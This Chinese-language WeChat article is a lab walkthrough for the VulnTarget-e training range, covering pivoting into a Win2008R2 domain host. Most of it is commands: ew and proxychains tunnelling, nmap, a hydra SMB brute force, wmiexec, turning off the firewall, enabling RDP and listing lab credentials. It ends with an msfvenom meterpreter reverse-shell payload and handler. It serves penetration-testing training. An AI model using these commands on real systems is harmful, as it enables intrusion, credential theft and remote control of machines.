0x01 前言
其他
红蓝对抗靶场之内网渗透【三】
声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。 |
宝子们现在只对常读和星标的公众号才展示大图推送,建议大家把李白你好“设为星标”,否则可能就看不到了啦!
以下是红蓝对抗靶场VulnTarget-e域内主机Win2008R2的打法。
涉及知识点
二级代理内网横向0x02 二级代理
ew.exe -s lcx_tran -l 2080 -f 192.168.100.131 -g 9999proxychains scp -r -i key /home/z4pts/桌面/ew root@192.168.100.131:/www/wwwroot/vulntarget-e2/ew/root/ew -s ssocksd -l 9999 & //置于后台运行vi /etc/proxychains4.confsocks5 192.168.1.5 2080proxychains curl http://192.168.88.100/proxychains nmap -Pn -sT -p1-65535 192.168.88.102proxychains hydra -l administrator -P password.txt 192.168.88.102 smb0x03 内网横向
步骤四:根据以上爆破的结果使用Impacket中提供的wmiexec.py工具远程连接其命令执行环境获取交互式接口..
proxychains python3 wmiexec.py administrator@192.168.88.102chcp 65001步骤五:执行以下命令进行信息收集并开启关闭相对应的功能...
whoami //win-n4dk5rpd2qu\administratorhostname //win-n4dk5rpd2quipconfig /all //域:vulntarget.com 192.168.88.102/24 10.0.10.9/24arp -a //10.0.10.10 netsh advfirewall set allprofiles state off //关闭防火墙REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f //开启3389端口步骤六:在MSF上开启代理在外界windows主机上使用SocksCap64挂上代理访问远程桌面,如下成功!!!
开启代理
use auxiliary/server/socks_proxy show options run主机信息
ip address:192.168.88.102username:administratorpassword:admin@1230x04 上线MSF
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.88.100 LPORT=4444 -f exe > inside.exemsfconsoleuse exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost 192.168.88.100set lport 4444run0x05 往期精彩
VulnTarget-e边界主机权限获取【一】
红蓝对抗靶场VulnTarget-e之内网渗透【二】